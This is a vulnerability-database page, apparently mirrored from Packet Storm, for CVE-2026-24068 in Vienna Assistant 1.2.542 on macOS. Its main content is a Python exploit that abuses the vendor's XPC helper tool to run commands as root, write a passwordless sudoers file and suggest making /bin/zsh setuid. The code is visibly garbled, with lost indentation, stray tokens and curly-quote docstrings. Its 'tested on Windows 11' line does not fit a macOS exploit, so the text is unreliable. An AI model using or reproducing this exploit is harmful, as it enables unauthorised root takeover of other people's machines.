Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Vienna Assistant 1.2.542 macOS Privilege Escalation

🗓️ 27 Apr 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 64 Views

macOS NSXPC HelperTool interface abuse may enable privileged file write and command execution.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-24068
26 Mar 202610:55
attackerkb
Circl		CVE-2026-24068
27 Mar 202600:00
circl
CNNVD		Vienna Symphonic Library Vienna Assistant 安全漏洞
26 Mar 202600:00
cnnvd
CVE		CVE-2026-24068
26 Mar 202610:55
cve
Cvelist		CVE-2026-24068 Missing XPC Client & NSXPC endpoint validation leads to privilege escalation in Vienna Assistant (MacOS) - Vienna Symphonic Library
26 Mar 202610:55
cvelist
EUVD		EUVD-2026-16160
26 Mar 202612:30
euvd
NVD		CVE-2026-24068
26 Mar 202611:16
nvd
Packet Storm News		Vienna Assistant 1.2.542 Local Privilege Escalation
3 Apr 202600:00
packetstormnews
Positive Technologies		PT-2026-28337
26 Mar 202600:00
ptsecurity
Vulnrichment		CVE-2026-24068 Missing XPC Client & NSXPC endpoint validation leads to privilege escalation in Vienna Assistant (MacOS) - Vienna Symphonic Library
26 Mar 202610:55
vulnrichment
Rows per page
==================================================================================================================================
    | # Title     : Vienna Assistant 1.2.542 macOS NSXPC HelperTool Interface Abuse Leading to Potential Privilege Escalation        |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.vsl.co.at/                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : A macOS helper service interface implemented via NSXPC was observed exposing methods that may allow privileged operations such as file writing and command execution through a remote proxy connection.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import objc
    from Foundation import *
    import sys
    import os
    
    objc.loadBundle('Foundation', globals(), '/System/Library/Frameworks/Foundation.framework')
    
    class HelperToolProtocol(objc.protocolNamed('HelperToolProtocol')): 
    pass. pass
    
    class ExploitClient: 
    def __init__(self): 
    self. connection = None 
    
    def connect(self): 
    “Contact HelperTool” 
    try: 
    self.connection = NSXPCConnection.alloc().initWithMachServiceName_options_( 
    "com.vsl.HelperTool", 0 
    ) 
    self.connection.setRemoteObjectInterface_( 
    NSXPCInterface.interfaceWithProtocol_(HelperToolProtocol) 
    ) 
    self.connection.resume() 
    
    if self.connection is None: 
    print("[-] Connection object is None") 
    return False 
    
    print("[+] Connected to HelperTool service") 
    return True 
    except Exception as e: 
    print(f"[-] Connection failed: {e}") 
    return False 
    
    def write_file(self, path, content): 
    “Write a file anywhere as root.” 
    try: 
    if not self.connection: 
    print("[-] No active connection") 
    return False 
    
    remote = self.connection.remoteObjectProxy() 
    data = content.encode('utf-8') 
    nsdata = NSData.dataWithBytes_length_(data, len(data)) 
    
    if not remote: 
    print("[-] Remote proxy unavailable") 
    return False 
    
    remote.writeReceiptFile_withData_withReply_(path, nsdata, lambda error: None) 
    print(f"[+] File written: {path}") 
    return True 
    except Exception as e: 
    print(f"[-] Failed to write file: {e}") 
    return False 
    
    def execute_command(self, command, args=None): 
    "Execute command as root" 
    if args is None: 
    args = [] 
    
    if not self.connection: 
    print("[-] No active connection") 
    return False 
    
    nsargs = NSMutableArray.array() 
    for arg in args: 
    nsargs.addObject_(arg) 
    
    try: 
    remote = self.connection.remoteObjectProxy() 
    
    if not remote: 
    print("[-] Remote proxy unavailable") 
    return False 
    
    remote.runUninstaller_withArgs_withReply_(command, nsargs, lambda error: None) 
    print(f"[+] Command executed: {command} {' '.join(args)}") 
    return True 
    except Exception as e: 
    print(f"[-] Command execution failed: {e}") 
    return False
    
    def main(): 
    print("=" * 60) 
    print("CVE-2026-24068 - Vienna Assistant Privilege Escalation") 
    print("macOS Local Privilege Escalation Exploit") 
    print("=" * 60) 
    print() 
    
    if len(sys.argv) < 2: 
    print(f"Usage: {sys.argv[0]} <command> [args...]") 
    print() 
    print("Examples:") 
    print(f" {sys.argv[0]} /bin/bash -c 'id > /tmp/test.txt'") 
    print(f" {sys.argv[0]} /usr/bin/whoami") 
    print(f" {sys.argv[0]} /bin/bash -c 'chmod 4755 /bin/zsh'") 
    sys. exit(1) 
    
    client = ExploitClient() 
    if not client.connect(): 
    print("[-] Failed to connect. Is Vienna Assistant installed?") 
    sys. exit(1) 
    
    command = sys.argv[1] 
    args = sys.argv[2:] if len(sys.argv) > 2 else [] 
    
    print(f"[*] Executing: {command} {' '.join(args)}") 
    client.execute_command(command, args) 
    
    print("\n[*] Attempting additional exploitation methods...") 
    current_user = os.environ.get('USER') or "attacker" 
    
    sudoers = f"{current_user} ALL=(ALL) NOPASSWD: ALL\n" 
    client.write_file(f"/etc/sudoers.d/{current_user}", sudoers) 
    
    client.write_file("/tmp/vienna_exploited.txt", "Vienna Assistant CVE-2026-24068 exploited successfully!\n") 
    
    print("\n[+] Exploit completed!") 
    print("[*] Verification: cat /tmp/vienna_exploited.txt")
    
    
    if __name__ == "__main__": 
    main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Apr 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.18.8
EPSS0.00021
SSVC
macOS helper toolprivilege escalationremote interfacefile writecommand execution
64